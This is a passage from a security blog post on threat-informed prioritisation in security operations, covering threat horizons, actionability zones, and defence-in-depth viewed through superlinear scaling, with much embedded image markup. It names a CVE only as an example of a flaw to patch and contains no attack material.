https://substackcdn.com/image/fetch/$s_!eT8C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!eT8C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png" width="1101" height="479" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:479,&quot;width&quot;:1101,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;past-present-future.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="past-present-future.excalidraw" title="past-present-future.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!eT8C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 424w, https://substackcdn.com/image/fetch/$s_!eT8C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 848w, https://substackcdn.com/image/fetch/$s_!eT8C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 1272w, https://substackcdn.com/image/fetch/$s_!eT8C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1228021a-2770-4eca-ab29-70de1d92af0b_1101x479.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>When considering temporal layers on top of our actionability zones we get the concept of <strong>threat horizons</strong>. A threat horizon brings in the experience of change because the asymmetry of time brings us closer to the reality of <a href="https://www.wikiwand.com/en/Irreversibility">irreversible structural changes</a>. If things weren&#8217;t changing, it is unclear how we would experience a sense of time passing.</p><p>If we had to depict this with a <em>di&#279;gram</em>, using the actionability <em>di&#279;grams</em> from <a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">Part 1</a>, it would look like this (yeah... I know you know I love <a href="https://excalidraw.com/">Excalidraw</a>):</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!edMq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!edMq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 424w, https://substackcdn.com/image/fetch/$s_!edMq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 848w, https://substackcdn.com/image/fetch/$s_!edMq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 1272w, https://substackcdn.com/image/fetch/$s_!edMq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!edMq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg" width="1456" height="1273" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1273,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-021.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-021.excalidraw" title="threat-horizons-021.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!edMq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 424w, https://substackcdn.com/image/fetch/$s_!edMq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 848w, https://substackcdn.com/image/fetch/$s_!edMq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 1272w, https://substackcdn.com/image/fetch/$s_!edMq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F653f2144-d7f3-4e5c-8c3a-88b3c6d08e8e_1037x907.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>As we saw in <a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">Part 1 of this series</a>, one way of thinking about the threats that can/do impact your organization is in terms of their <strong>actionability</strong>. We formalized this concept in two possible definitions (because we like to embrace ambiguity), here's one of them:</p><p>the ability for an organization to articulate decision-making processes based on available information, to direct the actions required for mitigating risk exposure to cyber threats.</p><p>The term "actionability" in this context refers to the degree to which a threat that poses a realistic risk to the business can be addressed effectively by an organization. I know what you are thinking: <em>but Diego, you are not addressing the very core of what a "realistic risk" is, aren't we in danger of falling into a circular definition?</em> (i.e. actionability is defined in terms of that which poses a realistic risk; a realistic risk is that which by its own virtue has been identified as actionable)</p><p>&#128269;&#129300;Well, perhaps this will be disappointing to you but, <em>I am not trying to tell you what constitutes a realistic risk for your business</em>, that's not my job. I am trying to help you understand the ways in which you can produce a threat-informed pipeline of work that is meaningful for your CyberOps. I don't sell those magic pills many vendors promise. In fact, I'm not selling you anything ;) We are co-creating here, I'm helping you carve new patterns of thought that I hope will inspire better ways to solve the usual problems.</p><p>Actionability does not care if the threat is within the realm of unrelated possible threats "out there", it only cares about those threats that are likely applicable to your digital landscape given the state of your attack surface. We are not asking ourselves <em>what is the impact and likelihood</em> here. The question we are trying to answer is: <code>should you do something about it</code>, <code>can you do something about it</code> and <code>did you do something about it?</code></p><p>Just because there is a likely threat, it doesn't mean you <code>will do</code> something about it. Even more, just because there is a likely threat, it doesn't mean you <code>can do</code> something about it. Small businesses with very limited budgets certainly cannot afford to do something about every likely threat out there.</p><p>Allow me to rephrase the ideas above in terms of could, should, have:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zM2D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zM2D!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 424w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 848w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 1272w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zM2D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg" width="1456" height="1235" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1235,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;threat-horizons-03.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="threat-horizons-03.excalidraw" title="threat-horizons-03.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!zM2D!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 424w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 848w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 1272w, https://substackcdn.com/image/fetch/$s_!zM2D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc2eb67c7-4c77-4ae2-97a4-7951b433338c_949x805.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>When presented this way, the actionability zones become more clear. There are threats that you <em>could</em> do something about, but this doesn't mean all of them are relevant enough to deserve your attention and resource allocation. However, a subset of the latter are those threats you <em>should</em> definitively <em>do</em> something about, i.e. if you are running Ivanti Sentry and are aware of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38035">CVE-2023-38035</a> with a vulnerability severity rating of 9.8, you should definitively allocate resources to patch, protect and respond to threats in that area.</p><p>Despite the above, not all the threats you should do something about are effectively addressed. The reason is simple: <strong>there is not an infinite pool of resources at your disposal</strong>. You have to prioritize, inevitably. This of course means you will end up <em>doing something</em> about Ivanti Sentry CVE-2023-38035, but may not do something immediately about the 30% of employees who so quickly fell for that phishing simulation, once again.</p><p>It does not mean you won't do something about that phishing simulation results in the near future, it just means you have de-prioritized that threat in your <strong>present horizon</strong>. You may send those employees to their tenth round of phishing training with some boring slides, with a caveat though: only if your organization sustains the awareness about that threat and it doesn't fade away into the <strong>past horizon</strong>.</p><p>There is an important question here, which goes to the heart of this article series: <strong>how do we harness the power of our threat intelligence pipeline to maximize the probability of focusing on the right threats?</strong> Or to put it bluntly in negative terms: <em>how do we avoid wasting resources on irrelevant threats?</em></p><p>To achieve effective resource allocation for this informational problem, we need to find a way to develop synergistic relationships at every stage of the information processing pipeline between the interconnected systems that consume its outputs and the stakeholders that make decisions based on the data.</p><p>One way to make our temporal and spatial layered defences more effective is by building for a specific type of synergistic effect called superlinearity. Amongst other properties, this effect is an aspect of what I've been calling <strong>adaptive defence</strong>.</p><p>Let's explore what synergistic defence-in-depth means in the next few sections, and how can we draw from this idea to engineer better threat intelligence pipelines.</p><h2>Defence-in-Depth and Superlinearity</h2><p>Good'ol defense-in-depth, don't we all love that concept? In a way, it helps us picture cyber defence as a series of layered controls and compensating mechanisms that act in unison to neutralize those nasty cyber threats. Phil Venables has an <a href="https://www.philvenables.com/post/defense-in-depth">excellent article</a> on this topic (already highlighted by Anton Chuvakin in <a href="https://medium.com/anton-on-security/how-to-solve-the-mystery-of-cloud-defense-in-depth-84e1db3d6276">another piece</a>) where he goes beyond the easy portrait of defence-in-depth and delves deeper trying to clarify what it means. Phil states that:</p><p>"... we need to update our notion of defense in depth with a more modern framing... The goal of defense in depth is not just multiple layers of controls to collectively mitigate one or more risks, but rather multiple layers of inter-locking or inter-linked controls"</p><p>Further, he indicates that</p><p>"If there are N layers then the goal is not just a linear increase in control in proportion to N, but rather super-linear scaling of that effect..."</p><p>The concept of superlinear scaling is very apt here and caught my attention. Superlinearity is a condition where a system's response is more than proportional to the input. It has been heavily studied in the fields of computing, engineering and economics.</p><p>This is typically illustrated by the multiprocessing capability of modern processors and it's behind the massive success of "the cloud". Parallel computing evokes the intuitive idea that working on a task with parallel processing power decreases the processing time in a linear way: doubling the number of processing units halves the execution time. However, in parallel computing, superlinearity effects show that as the system size grows, each individual processing unit becomes increasingly more efficient, which is a counterintuitive outcome (see <a href="https://link.springer.com/chapter/10.1007/978-3-319-77610-1_3">here</a>, and <a href="https://annals-csis.org/Volume_8/pliks/498.pdf">here</a>).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WbH2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WbH2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 424w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 848w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 1272w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WbH2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png" width="640" height="372" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:372,&quot;width&quot;:640,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!WbH2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 424w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 848w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 1272w, https://substackcdn.com/image/fetch/$s_!WbH2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F040b8f0d-3f38-46a5-9174-7245cbeba138_640x372.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>(image from: <a href="https://queue.acm.org/detail.cfm?id=2789974">Hadoop Superlinear Scalability</a>)</p><p>It must be noted though that superlinearity is a property of a system's response to changes in certain factors, and those factors vary depending on the context. <em>A higher quantity of processing resources is not a universal recipe to achieve superlinearity</em>, in most cases you won't get there by merely scaling computing power. In a more broad sense, superlinearity can be thought of as a <strong>metastable phenomenon that relates to information dynamics</strong>. It is achieved by the convergence of three dimensions: <strong>competitive/cooperative processing schemes, information sharing ratio and network utilization</strong>. Too much or too little of either of these variable factors and we might lose the superlinearity effect.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_lRY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_lRY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 424w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 848w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 1272w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_lRY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg" width="1456" height="976" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:976,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;superlinearity-dimensions.excalidraw&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="superlinearity-dimensions.excalidraw" title="superlinearity-dimensions.excalidraw" srcset="https://substackcdn.com/image/fetch/$s_!_lRY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 424w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 848w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 1272w, https://substackcdn.com/image/fetch/$s_!_lRY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6476a987-1d20-49e4-a505-5ade3658cdca_910x610.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 